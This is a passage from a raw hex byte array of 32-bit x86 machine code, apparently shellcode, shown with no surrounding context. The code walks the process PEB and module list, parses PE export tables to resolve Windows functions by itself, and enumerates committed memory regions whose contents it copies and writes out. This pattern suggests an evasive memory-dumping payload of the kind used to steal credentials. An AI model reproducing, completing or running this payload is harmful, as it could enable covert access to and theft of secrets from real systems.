F,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0x00,0xFF,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x8D,0x0C,0x02,0x8B,0x85,0x08,0xFF,0xFF,0xFF,0x8B,0x95,0x0C,0xFF,0xFF,0xFF,0x89,0x01,0x89,0x51,0x04,0x83,0x45,0xDC,0x08,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x8D,0x0C,0x02,0x8B,0x85,0x10,0xFF,0xFF,0xFF,0x8B,0x95,0x14,0xFF,0xFF,0xFF,0x89,0x01,0x89,0x51,0x04,0xC7,0x44,0x24,0x08,0x6C,0x00,0x00,0x00,0x8D,0x85,0x20,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x39,0xF3,0xFF,0xFF,0x85,0xC0,0x75,0x21,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xE0,0x89,0x04,0x24,0xE8,0xC8,0xDC,0xFF,0xFF,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x6B,0x8B,0x45,0xE4,0x8B,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x85,0x2A,0xFC,0xFF,0xFF,0x8B,0x45,0x90,0x6B,0xC0,0x6C,0x83,0xC0,0x04,0x89,0x85,0x1C,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x85,0x1C,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x30,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x9C,0xF2,0xFF,0xFF,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0x8C,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x34,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x7A,0xF2,0xFF,0xFF,0x8B,0x45,0xE0,0x81,0xC4,0x5C,0x01,0x00,0x00,0x5B,0x5E,0x5F,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0x8B,0x45,0x0C,0x89,0x45,0xFC,0xEB,0x3B,0x8B,0x45,0xFC,0x8B,0x50,0x0C,0x8B,0x40,0x08,0x89,0xC2,0x8B,0x45,0x08,0x39,0xD0,0x72,0x21,0x8B,0x45,0xFC,0x8B,0x50,0x0C,0x8B,0x40,0x08,0x89,0xC2,0x8B,0x45,0xFC,0x8B,0x40,0x10,0x01,0xD0,0x8B,0x55,0x08,0x39,0xC2,0x73,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x13,0x8B,0x45,0xFC,0x8B,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x75,0xBF,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x74,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x1C,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xB0,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x8B,0x00,0xC7,0x44,0x24,0x14,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x1C,0x00,0x00,0x00,0x8D,0x55,0xB0,0x89,0x54,0x24,0x0C,0x8B,0x55,0xE4,0x89,0x54,0x24,0x08,0x8B,0x55,0xF0,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x50,0xEB,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x0F,0x88,0x9E,0x01,0x00,0x00,0x8B,0x45,0xB0,0x89,0x45,0xDC,0x8B,0x45,0xBC,0x89,0x45,0xD0,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x8B,0x45,0xDC,0x89,0xC1,0xBB,0x00,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x55,0xD4,0x01,0xC8,0x11,0xDA,0x8B,0x4D,0xDC,0xBB,0x00,0x00,0x00,0x00,0x39,0xC8,0x89,0xD0,0x19,0xD8,0x0F,0x82,0x66,0x01,0x00,0x00,0x8B,0x55,0xD0,0x8B,0x45,0xDC,0x01,0xD0,0x89,0x45,0xF0,0x8B,0x45,0xC0,0x3D,0x00,0x10,0x00,0x00,0x0F,0x85,0x20,0x01,0x00,0x00,0x8B,0x45,0xC8,0x3D,0x00,0x00,0x04,0x00,0x0F,0x84,0x18,0x01,0x00,0x00,0x8B,0x45,0xC4,0x83,0xE0,0x01,0x85,0xC0,0x0F,0x85,0x10,0x01,0x00,0x00,0x8B,0x45,0xC4,0x25,0x00,0x01,0x00,0x00,0x85,0xC0,0x0F,0x85,0x06,0x01,0x00,0x00,0x8B,0x45,0xC4,0x83,0xE0,0x10,0x85,0xC0,0x0F,0x85,0xFE,0x00,0x00,0x00,0x8B,0x45,0xC8,0x3D,0x00,0x00,0x00,0x01,0x75,0x1A,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8B,0x45,0xDC,0x89,0x04,0x24,0xE8,0x7F,0xFE,0xFF,0xFF,0x85,0xC0,0x0F,0x84,0xE0,0x00,0x00,0x00,0x8B,0x45,0x08,0x8B,0x40,0x04,0x39,0x45,0xDC,0x0F,0x84,0xD7,0x00,0x00,0x00,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x28,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x0C,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xBA,0x00,0x00,0x00,0x8B,0x45,0xCC,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0xDC,0xBA,0x00,0x00,0x00,0x00,0x8B,0x4D,0xCC,0x89,0x41,0x08,0x89,0x51,0x0C,0x8B,0x4D,0xCC,0x8B,0x45,0xD0,0x8B,0x55,0xD4,0x89,0x41,0x10,0x89,0x51,0x14,0x8B,0x55,0xC0,0x8B,0x45,0xCC,0x89,0x50,0x18,0x8B,0x55,0xC4,0x8B,0x45,0xCC,0x89,0x50,0x1C,0x8B,0x55,0xC8,0x8B,0x45,0xCC,0x89,0x50,0x20,0x83,0x7D,0xF4,0x00,0x75,0x08,0x8B,0x45,0xCC,0x89,0x45,0xF4,0xEB,0x21,0x8B,0x45,0xF4,0x89,0x45,0xE8,0xEB,0x08,0x8B,0x45,0xE8,0x8B,0x00,0x89,0x45,0xE8,0x8B,0x45,0xE8,0x8B,0x00,0x85,0xC0,0x75,0xEF,0x8B,0x45,0xE8,0x8B,0x55,0xCC,0x89,0x10,0x83,0x45,0xEC,0x01,0xE9,0x4D,0xFE,0xFF,0xFF,0x90,0xE9,0x47,0xFE,0xFF,0xFF,0x90,0xE9,0x41,0xFE,0xFF,0xFF,0x90,0xE9,0x3B,0xFE,0xFF,0xFF,0x90,0xE9,0x35,0xFE,0xFF,0xFF,0x90,0xE9,0x2F,0xFE,0xFF,0xFF,0x90,0xE9,0x29,0xFE,0xFF,0xFF,0x90,0xE9,0x23,0xFE,0xFF,0xFF,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x54,0x8B,0x45,0x08,0x8B,0x40,0x08,0x89,0x45,0xE4,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xA6,0xFD,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAA,0x03,0x00,0x00,0x8B,0x45,0xF0,0x89,0x45,0xF4,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xEB,0x1A,0x8B,0x45,0xD8,0x8B,0x55,0xDC,0x83,0xC0,0x01,0x83,0xD2,0x00,0x89,0x45,0xD8,0x89,0x55,0xDC,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0xE0,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0x8D,0x45,0xD8,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x8B,0xEF,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x1A,0xD9,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x32,0x03,0x00,0x00,0x8B,0x45,0xD8,0x8B,0x55,0xDC,0x83,0xC0,0x01,0x83,0xD2,0x00,0x0F,0xA4,0xC2,0x04,0xC1,0xE0,0x04,0x83,0xFA,0x00,0x76,0x24,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xDE,0xD8,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xF6,0x02,0x00,0x00,0x8B,0x45,0xD8,0x8B,0x55,0xDC,0x83,0xC0,0x01,0xC1,0xE0,0x04,0x89,0x45,0xD4,0x8B,0x45,0xE4,0x89,0xC1,0xBB,0x00,0x00,0x00,0x00,0x8B,0x45,0xD4,0xBA,0x00,0x00,0x00,0x00,0x01,0xC8,0x11,0xDA,0x89,0x45,0xC8,0x89,0x55,0xCC,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xE2,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x71,0xD8,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x89,0x02,0x00,0x00,0x8B,0x45,0xF0,0x89,0x45,0xF4,0xE9,0x92,0x00,0x00,0x00,0x8B,0x45,0xF4,0x83,0xC0,0x08,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x92,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x21,0xD8,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x39,0x02,0x00,0x00,0x8B,0x45,0xF4,0x83,0xC0,0x10,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x4D,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xDC,0xD7,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xF4,0x01,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x85,0x64,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0xD4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x3C,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xBF,0xED,0xFF,0xFF,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0xE4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x40,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x9D,0xED,0xFF,0xFF,0x8B,0x45,0xF0,0x89,0x45,0xF4,0xE9,0x86,0x01,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x89,0xC3,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x0C,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x55,0x01,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x89,0xC3,0x8B,0x45,0xF4,0x8B,0x50,0x0C,0x8B,0x40,0x08,0x89,0xC1,0x8B,0x45,0x08,0x8B,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x89,0x5C,0x24,0x0C,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0x89,0x4C,0x24,0x04,0x89,0x04,0x24,0xE8,0x44,0xE6,0xFF,0xFF,0x89,0x45,0xE8,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x83,0xFA,0x00,0x76,0x11,0x8B,0x45,0xF4,0xC7,0x40,0x10,0xFF,0xFF,0xFF,0xFF,0xC7,0x40,0x14,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x89,0x44,0x24,0x08,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x0B,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x71,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x9A,0xD6,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xEC,0x00,0x74,0x4A,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xE9,0x23,0x00,0x00,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x65,0x83,0x7D,0xEC,0x00,0x74,0x4A,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x92,0x23,0x00,0x00,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x85,0x70,0xFE,0xFF,0xFF,0x8B,0x45,0xF0,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x86,0xEC,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC2,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x5C,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA9,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x52,0xEF,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x90,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x35,0xF3,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x75,0x8B,0x45,0xF4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x9E,0xFB,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x21,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x38,0xD5,0xFF,0xFF,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x39,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x17,0xD5,0xFF,0xFF,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xFD,0xD4,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x90,0x90,0x90,0x55,0x89,0xE5,0x83,0xEC,0x20,0xC7,0x45,0xEC,0x30,0x00,0x00,0x00,0x8B,0x45,0xEC,0x64,0x8B,0x00,0x89,0x45,0xE8,0x8B,0x45,0xE8,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x8B,0x40,0x0C,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x83,0xC0,0x0C,0x89,0x45,0xF0,0x8B,0x45,0xF4,0x8B,0x40,0x0C,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x8B,0x40,0x18,0x89,0xC2,0x8B,0x45,0x08,0x39,0xD0,0x72,0x1F,0x8B,0x45,0xFC,0x8B,0x40,0x18,0x89,0xC2,0x8B,0x45,0xFC,0x8B,0x40,0x20,0x01,0xD0,0x8B,0x55,0x08,0x39,0xC2,0x73,0x08,0x8B,0x45,0xFC,0x8B,0x40,0x18,0xEB,0x15,0x8B,0x45,0xFC,0x8B,0x00,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x3B,0x45,0xF0,0x75,0xC2,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0x83,0x7D,0x08,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x60,0x8B,0x45,0x08,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x0F,0xB7,0x00,0x66,0x3D,0x4D,0x5A,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x47,0x8B,0x45,0xFC,0x8B,0x40,0x3C,0x89,0xC2,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x8B,0x00,0x3D,0x50,0x45,0x00,0x00,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x24,0x8B,0x45,0xF8,0x0F,0xB7,0x40,0x16,0x66,0x89,0x45,0xF6,0x0F,0xB7,0x45,0xF6,0x25,0x00,0x20,0x00,0x00,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xE0,0x30,0x00,0x00,0x00,0x8B,0x45,0xE0,0x64,0x8B,0x00,0x89,0x45,0xDC,0x8B,0x45,0xDC,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x8B,0x40,0x0C,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x83,0xC0,0x0C,0x89,0x45,0xE8,0x8B,0x45,0xEC,0x8B,0x40,0x0C,0x89,0x45,0xF4,0xEB,0x42,0x8B,0x45,0xF4,0x8B,0x40,0x18,0x39,0x45,0x08,0x74,0x2B,0x8B,0x45,0xF4,0x8B,0x40,0x18,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8B,0x55,0x0C,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x7D,0x01,0x00,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x74,0x08,0x8B,0x45,0xE4,0xEB,0x19,0x90,0xEB,0x01,0x90,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x3B,0x45,0xE8,0x75,0xB6,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x53,0x81,0xEC,0x30,0x03,0x00,0x00,0xC7,0x44,0x24,0x04,0x2E,0x00,0x00,0x00,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0x07,0x21,0x00,0x00,0x83,0xC0,0x01,0x89,0x45,0xF4,0x8B,0x55,0xF4,0x8B,0x45,0x0C,0x29,0xC2,0x89,0x55,0xF0,0x8D,0x85,0xE3,0xFE,0xFF,0xFF,0xB9,0x05,0x01,0x00,0x00,0xBB,0x00,0x00,0x00,0x00,0x89,0x18,0x89,0x5C,0x08,0xFC,0x8D,0x50,0x04,0x83,0xE2,0xFC,0x29,0xD0,0x01,0xC1,0x83,0xE1,0xFC,0xC1,0xE9,0x02,0x89,0xD7,0x89,0xD8,0xF3,0xAB,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8D,0x85,0xE3,0xFE,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xA6,0x20,0x00,0x00,0x8D,0x85,0xE3,0xFE,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x88,0x20,0x00,0x00,0x89,0xC2,0x8D,0x85,0xE3,0xFE,0xFF,0xFF,0x01,0xD0,0xC7,0x00,0x64,0x6C,0x6C,0x00,0x8D,0x85,0xDA,0xFC,0xFF,0xFF,0xB9,0x08,0x02,0x00,0x00,0xBB,0x00,0x00,0x00,0x00,0x89,0x18,0x89,0x5C,0x08,0xFC,0x8D,0x50,0x04,0x83,0xE2,0xFC,0x29,0xD0,0x01,0xC1,0x83,0xE1,0xFC,0xC1,0xE9,0x02,0x89,0xD7,0x89,0xD8,0xF3,0xAB,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x8D,0x85,0xE3,0xFE,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8D,0x85,0xDA,0xFC,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xF4,0x1F,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8D,0x85,0xDA,0xFC,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xD6,0x01,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x75,0x22,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x98,0xDC,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x5C,0xFE,0xFF,0xFF,0x89,0x45,0xE8,0x8B,0x45,0xE8,0xEB,0x28,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x76,0xDC,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x10,0x00,0x00,0x00,0x89,0x45,0xE8,0x8B,0x45,0xE8,0x81,0xC4,0x30,0x03,0x00,0x00,0x5B,0x5F,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x58,0x8B,0x45,0x10,0x66,0x89,0x45,0xC4,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x95,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x51,0x01,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x8B,0x40,0x3C,0x89,0xC2,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xE8,0x8B,0x45,0xE8,0x83,0xC0,0x78,0x89,0x45,0xE4,0x8B,0x45,0xE4,0x8B,0x40,0x04,0x85,0xC0,0x74,0x09,0x8B,0x45,0xE4,0x8B,0x00,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x15,0x01,0x00,0x00,0x8B,0x45,0xE4,0x8B,0x10,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xE0,0x8B,0x45,0xE4,0x8B,0x40,0x04,0x89,0x45,0xDC,0x8B,0x45,0xE0,0x8B,0x50,0x1C,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xD8,0x8B,0x45,0xE0,0x8B,0x50,0x20,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xD4,0x8B,0x45,0xE0,0x8B,0x50,0x24,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xD0,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x83,0x7D,0x0C,0x00,0x74,0x6C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xEB,0x56,0x8B,0x45,0xF0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xD4,0x01,0xD0,0x8B,0x10,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x89,0x04,0x24,0xE8,0x73,0xDB,0xFF,0xFF,0x39,0x45,0x0C,0x75,0x29,0x8B,0x45,0xF0,0x8D,0x14,0x00,0x8B,0x45,0xD0,0x01,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xD8,0x01,0xD0,0x8B,0x10,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xF4,0xEB,0x2F,0x83,0x45,0xF0,0x01,0x8B,0x45,0xE0,0x8B,0x40,0x18,0x39,0x45,0xF0,0x72,0x9F,0xEB,0x1E,0x0F,0xB7,0x55,0xC4,0x8B,0x45,0xE0,0x8B,0x40,0x10,0x29,0xC2,0xC1,0xE2,0x02,0x8B,0x45,0xD8,0x01,0xD0,0x8B,0x10,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x31,0x8B,0x55,0xF4,0x8B,0x45,0xE0,0x39,0xC2,0x72,0x24,0x8B,0x55,0xE0,0x8B,0x45,0xDC,0x01,0xD0,0x8B,0x55,0xF4,0x39,0xC2,0x73,0x15,0x8B,0x45,0xF4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x3B,0xFD,0xFF,0xFF,0x89,0x45,0xF4,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xD8,0x30,0x00,0x00,0x00,0x8B,0x45,0xD8,0x64,0x8B,0x00,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x8B,0x40,0x0C,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x83,0xC0,0x0C,0x89,0x45,0xE8,0x8B,0x45,0xEC,0x8B,0x40,0x0C,0x89,0x45,0xF4,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x36,0x1E,0x00,0x00,0x85,0xC0,0x0F,0x95,0xC0,0x0F,0xB6,0xC0,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x74,0x26,0x8B,0x45,0xF4,0x8B,0x40,0x28,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xA1,0x48,0xE1,0x88,0x6C,0xFF,0xD0,0x85,0xC0,0x75,0x31,0x8B,0x45,0xF4,0x8B,0x40,0x18,0xE9,0x01,0x01,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x40,0x30,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xA1,0x48,